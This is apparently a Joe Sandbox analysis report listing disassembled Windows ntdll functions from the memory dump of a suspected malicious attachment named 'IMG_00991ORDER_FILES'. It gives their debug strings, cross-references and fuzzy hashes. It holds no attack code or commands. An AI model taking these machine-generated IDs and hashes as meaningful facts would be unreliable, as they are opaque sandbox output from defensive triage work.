                                                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                    • API String ID: 3446177414-1700792311
                                                                                    • Opcode ID: 4643f1638a1d77abc904e19ebec7d14f693bd826d9c3145fb087266f92d55ecb
                                                                                    • Instruction ID: bf5db9ce9e6ab7dfebd412e5e3c4414cd5230d6c4e1ba6dc65ce7e8a2fb7c7f1
                                                                                    • Opcode Fuzzy Hash: 4643f1638a1d77abc904e19ebec7d14f693bd826d9c3145fb087266f92d55ecb
                                                                                    • Instruction Fuzzy Hash: 70D12875614786DFDB02CFE4C440AAEBBF2FF49310F458089E45AAB293DB76A941CB50
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                    • API String ID: 0-2515994595
                                                                                    • Opcode ID: 7bc20ac8300d8f91476cae3cbbf186ce7ab35d7b57fbdbe3bb87cee48fc03994
                                                                                    • Instruction ID: e84d5c974f458e265faa6b88785e65dfdc347cc4359ef9fdff483411ec61ebbf
                                                                                    • Opcode Fuzzy Hash: 7bc20ac8300d8f91476cae3cbbf186ce7ab35d7b57fbdbe3bb87cee48fc03994
                                                                                    • Instruction Fuzzy Hash: 9E5190BA6083169BD326CF149944BABB7EDFF84350F40491DFE9A93242E774D604CB92
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                    • API String ID: 3446177414-1745908468
                                                                                    • Opcode ID: f0a1f4715e8667c175b8ab4437e0d8561b94febb3d81c2ab4b55d67942819c58
                                                                                    • Instruction ID: 5c91619ed1cc2515cbfe2386188d8f2200ed7c3cf690f3640e41ba52ec361fb5
                                                                                    • Opcode Fuzzy Hash: f0a1f4715e8667c175b8ab4437e0d8561b94febb3d81c2ab4b55d67942819c58
                                                                                    • Instruction Fuzzy Hash: BD91267AA08785DFDB05CFA4C440A9EBBF2FF59310F45809AE456AB293CB769941CF10
                                                                                    APIs
                                                                                    • RtlDebugPrintTimes.NTDLL ref: 351C651C
                                                                                      • Part of subcall function 351C6565: RtlDebugPrintTimes.NTDLL ref: 351C6614
                                                                                      • Part of subcall function 351C6565: RtlDebugPrintTimes.NTDLL ref: 351C665F
                                                                                    Strings
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 352297A0, 352297C9
                                                                                    • LdrpInitShimEngine, xrefs: 35229783, 35229796, 352297BF
                                                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 352297B9
                                                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 35229790
                                                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3522977C
                                                                                    • apphelp.dll, xrefs: 351C6446
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 3446177414-204845295
                                                                                    • Opcode ID: 8e109aebaf46175bd25efdf937bb94709b08ab52ec0d393da0985efe86b0f552
                                                                                    • Instruction ID: 5c93601d0a5fdc0f36501dca1d5bc454f417060161ec81814b2423fd77a1f914
                                                                                    • Opcode Fuzzy Hash: 8e109aebaf46175bd25efdf937bb94709b08ab52ec0d393da0985efe86b0f552
                                                                                    • Instruction Fuzzy Hash: BA51DEB56183049FE320CF25D894EABBBF9FF84340F400959F596A72A1DB70D948CB92
                                                                                    APIs
                                                                                    • RtlDebugPrintTimes.NTDLL ref: 351FD879
                                                                                      • Part of subcall function 351D4779: RtlDebugPrintTimes.NTDLL ref: 351D4817
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 3446177414-1975516107
                                                                                    • Opcode ID: f60782c212d4d1a301ffffde402c5848a479e1d62cacf09c0dbc9f7e79422196
                                                                                    • Instruction ID: 03cf58821d8e7759ee663964beb044c1538e81a2c3c6e4e5fa0d18be803099cd
                                                                                    • Opcode Fuzzy Hash: f60782c212d4d1a301ffffde402c5848a479e1d62cacf09c0dbc9f7e79422196
                                                                                    • Instruction Fuzzy Hash: 4A5105B5B043459FDB14DF64D488BAEBFB2BF44308F524259D4057B282DBB6A946CBC0
                                                                                    Strings
                                                                                    • @, xrefs: 351CD24F
                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 351CD263
                                                                                    • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 351CD06F
                                                                                    • @, xrefs: 351CD2B3
                                                                                    • Control Panel\Desktop\LanguageConfiguration, xrefs: 351CD136
                                                                                    • @, xrefs: 351CD09D
                                                                                    • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 351CD0E6
                                                                                    • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 351CD202
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                    • API String ID: 0-1356375266
                                                                                    • Opcode ID: 62fdd17be7a83764a352d3731908c17d555786317e61366ece10bf220d74c3a2
                                                                                    • Instruction ID: d858784cb23f044db00131553da7075e3f4de2fb61f17e53c54699901c4649d9
                                                                                    • Opcode Fuzzy Hash: 62fdd17be7a83764a352d3731908c17d555786317e61366ece10bf220d74c3a2
                                                                                    • Instruction Fuzzy Hash: 4FA17EB59083859FE321CF25C480B5BB7E8BF84755F02496EF98996240DBB5DA08CF93
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                    • API String ID: 0-2224505338
                                                                                    • Opcode ID: 48d73b11ce4e6c68399849067f0c382c271ef116ca82b78575eb8d677d0e1054
                                                                                    • Instruction ID: 3223305aa1dd3cb64181d81c7e355653c8ec3b2d073d0ca1a056646cac8c69fd
                                                                                    • Opcode Fuzzy Hash: 48d73b11ce4e6c68399849067f0c382c271ef116ca82b78575eb8d677d0e1054
                                                                                    • Instruction Fuzzy Hash: 3451457A219245EFC702CF94C884E1AB7FAFF04660F1284DAF5269B223DA32D940DE14
                                                                                    Strings
                                                                                    • VerifierDebug, xrefs: 35258925
                                                                                    • AVRF: -*- final list of providers -*- , xrefs: 3525880F
                                                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 352586E7
                                                                                    • VerifierFlags, xrefs: 352588D0
                                                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 352586BD
                                                                                    • VerifierDlls, xrefs: 3525893D
                                                                                    • HandleTraces, xrefs: 3525890F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                    • API String ID: 0-3223716464
                                                                                    • Opcode ID: 812140d4955ad9653ee52f9139a25c0347708b400f254024cef51bed5403f614
                                                                                    • Instruction ID: 16b9aec47a0b1a4ca405dc7aad195695abd6d86f55a158aea6962c15358c5a9a
                                                                                    • Opcode Fuzzy Hash: 812140d4955ad9653ee52f9139a25c0347708b400f254024cef51bed5403f614
                                                                                    • Instruction Fuzzy Hash: 6D91F17660471AAFE311CB24C884B1AF7EAFF40664F554998FD456B282CBB0EC05CBD6
                                                                                    Strings
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 3523A7AF
                                                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3523A79F
                                                                                    • LdrpDynamicShimModule, xrefs: 3523A7A5
                                                                                    • apphelp.dll, xrefs: 351F2382
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-176724104
                                                                                    • Opcode ID: c28381ff767b84bffbd0812f98cd9d5d084646cf966eaa530eb311ef3212b81e
                                                                                    • Instruction ID: 48256e6fa6cb0f8b7a032e8d9b58da2432c520ac04466c3b1128ca327b9f18b4
                                                                                    • Opcode Fuzzy Hash: c28381ff767b84bffbd0812f98cd9d5d084646cf966eaa530eb311ef3212b81e
                                                                                    • Instruction Fuzzy Hash: 913127B5A10201ABE710DF18D8C9E99BBB6FF84740F160269E91577292DFB06842CB80
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                    • API String ID: 0-523794902
                                                                                    • Opcode ID: 0fa10d37addcb4351447a7ab56aa6de4cc232cce5be3c49b468244c347bbfbd7
                                                                                    • Instruction ID: 15c2bd3e946d0e6dd9d4c5af2f8083c3225480104e08475cc3efac8a10691bfb
                                                                                    • Opcode Fuzzy Hash: 0fa10d37addcb4351447a7ab56aa6de4cc232cce5be3c49b468244c347bbfbd7
                                                                                    • Instruction Fuzzy Hash: B54200792087819FD305CF24C484B2ABBF6FF98344F0549ADE486CB296DB71E946CB52
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                    • API String ID: 0-122214566
                                                                                    • Opcode ID: 434b2858479deac4bd7fd1268adc0b4f96a878aecbc53f3161ef0c2903d6b5f5
                                                                                    • Instruction ID: bbeeb4137698efd24bfeedd19ef68790176586710d248c74c6afb17a3463d905
                                                                                    • Opcode Fuzzy Hash: 434b2858479deac4bd7fd1268adc0b4f96a878aecbc53f3161ef0c2903d6b5f5
                                                                                    • Instruction Fuzzy Hash: D3C144B5A06B569BEB15CB64CC91BBFB7B1BF45340F514069EC02AB291EBB4DC44C390
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-792281065
                                                                                    • Opcode ID: 4d6cd1867181f914c167d5c9b480d13b7ba1ebc5ff3870fe0217c83195382cd0
                                                                                    • Instruction ID: 1417b20c19efcb6a0134526bc8ddecbbeb095d6a91912251997a5ae5dc941aab
                                                                                    • Opcode Fuzzy Hash: 4d6cd1867181f914c167d5c9b480d13b7ba1ebc5ff3870fe0217c83195382cd0
                                                                                    • Instruction Fuzzy Hash: D79147B0B157169FEB2CCF14D848F9ABBB2BF00B54F510159E9166B2C1DBB0A846CBD1
                                                                                    Strings
                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 35241F82
                                                                                    • RtlGetAssemblyStorageRoot, xrefs: 35241F6A, 35241FA4, 35241FC4
                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 35241FC9
                                                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 35241FA9
                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 35241F8A
                                                                                    • SXS: %s() passed the empty activation context, xrefs: 35241F6F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                    • API String ID: 0-861424205
                                                                                    • Opcode ID: 77b586d040514fa22775862929f495dbedf5fad9dbe6db44507cdc342c9f90f6
                                                                                    • Instruction ID: 29b983e32ac06f2920a94a522f8fb27a6d8387de01b86f23bab8fb0965dd1599
                                                                                    • Opcode Fuzzy Hash: 77b586d040514fa22775862929f495dbedf5fad9dbe6db44507cdc342c9f90f6
                                                                                    • Instruction Fuzzy Hash: CC31E5B6E013257BEB148A86CC40F5BB769AB40690F02449AFA0677244D770EE01CAA4
                                                                                    Strings
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 3520C5E3
                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 35247F8C, 35248000
                                                                                    • LdrpInitializeImportRedirection, xrefs: 35247F82, 35247FF6
                                                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 35247FF0
                                                                                    • Loading import redirection DLL: '%wZ', xrefs: 35247F7B
                                                                                    • LdrpInitializeProcess, xrefs: 3520C5E4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                    • API String ID: 0-475462383
                                                                                    • Opcode ID: 646d7c8944e69eeb4faaacd83dd3ce53a733cc94b83899c481e6d010e8f44767
                                                                                    • Instruction ID: fb7e03bd2046ac97449d3c802749bac744e7f1f297f95b72c20c5e07879b872b
                                                                                    • Opcode Fuzzy Hash: 646d7c8944e69eeb4faaacd83dd3ce53a733cc94b83899c481e6d010e8f44767
                                                                                    • Instruction Fuzzy Hash: 583123B57147029FD318DF28DC49E2ABBE5EF84710F010958F885AB282DB20DD06CBA2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                    • API String ID: 0-4253913091
                                                                                    • Opcode ID: 9c06c8ebdad25e74cafd40ab887fb639e4ca69534831635fab130a2ceb6a9754
                                                                                    • Instruction ID: 0d5dc478942b9820d83bbfdeb465810ea7dfb283063c6552194fe68737d78782
                                                                                    • Opcode Fuzzy Hash: 9c06c8ebdad25e74cafd40ab887fb639e4ca69534831635fab130a2ceb6a9754
                                                                                    • Instruction Fuzzy Hash: A4F19CB4B01A06DFEB15CF68C894F6AB7B6FF44340F1441A9E45A9B381DB74E981CB90
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                    • API String ID: 3446177414-2283098728
                                                                                    • Opcode ID: 5584eba7c70bedff0961acbb139ed430d019a0aad01396170b3eeaf4f3e3900f
                                                                                    • Instruction ID: 1b955b53f3da4f7ad32d0375e91672973afd193ba6a14841612b405fa1e04b0d
                                                                                    • Opcode Fuzzy Hash: 5584eba7c70bedff0961acbb139ed430d019a0aad01396170b3eeaf4f3e3900f
                                                                                    • Instruction Fuzzy Hash: 995110757047059BE724FF38D884E19B7B2BB84310F150B6DE55297292EBB2E845CF82
                                                                                    APIs
                                                                                    Strings
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 352480F3
                                                                                    • Failed to reallocate the system dirs string !, xrefs: 352480E2
                                                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 352480E9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 3446177414-1783798831
                                                                                    • Opcode ID: fa057a12d08d4e91ae0a67042ac4f1a755c941bcecdf8e7d7aa0bf964f76a796
                                                                                    • Instruction ID: 4d11354a63a578c6e98eb59449f8cfd6e1894423067e911de543840ff2cad47d
                                                                                    • Opcode Fuzzy Hash: fa057a12d08d4e91ae0a67042ac4f1a755c941bcecdf8e7d7aa0bf964f76a796
                                                                                    • Instruction Fuzzy Hash: A04102B5625301ABD720DB24DC44F4BBBF9BF84250F00092AF959A3292EF74E801CF96
                                                                                    Strings
                                                                                    • Kernel-MUI-Language-SKU, xrefs: 351F534B
                                                                                    • WindowsExcludedProcs, xrefs: 351F514A
                                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 351F5272
                                                                                    • Kernel-MUI-Language-Allowed, xrefs: 351F519B
                                                                                    • Kernel-MUI-Number-Allowed, xrefs: 351F5167
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                    • API String ID: 0-258546922
                                                                                    • Opcode ID: 80e12b7433a0e3e2ab988982eb91f31f70a423cf129830d7dfad9e03ce1cdc01
                                                                                    • Instruction ID: 3e20e255cfe5cfcdf951af6ddd8419bc333f96047fb94ff51fe5bd9955eade73
                                                                                    • Opcode Fuzzy Hash: 80e12b7433a0e3e2ab988982eb91f31f70a423cf129830d7dfad9e03ce1cdc01
                                                                                    • Instruction Fuzzy Hash: B5F17FB6E05619EFCB11CF98C980EDEBBF9FF08650F52415AE905A7214EB719E01CB90
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID:
                                                                                    • API String ID: 3446177414-0
                                                                                    • Opcode ID: d589c4d03de92f71fb94d0824326e0759d1217cbe72bd589ede5cb4aeabcc00e
                                                                                    • Instruction ID: 03049b5f55d5c531de02cdc11a58acec4c1aac9e4a6cd9ce3951d6458cec2995
                                                                                    • Opcode Fuzzy Hash: d589c4d03de92f71fb94d0824326e0759d1217cbe72bd589ede5cb4aeabcc00e
                                                                                    • Instruction Fuzzy Hash: 69F1E577E006529BDB08CE68C9A067DFBF6AF88300B1A416DD85ADB381DB74E941CB50
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
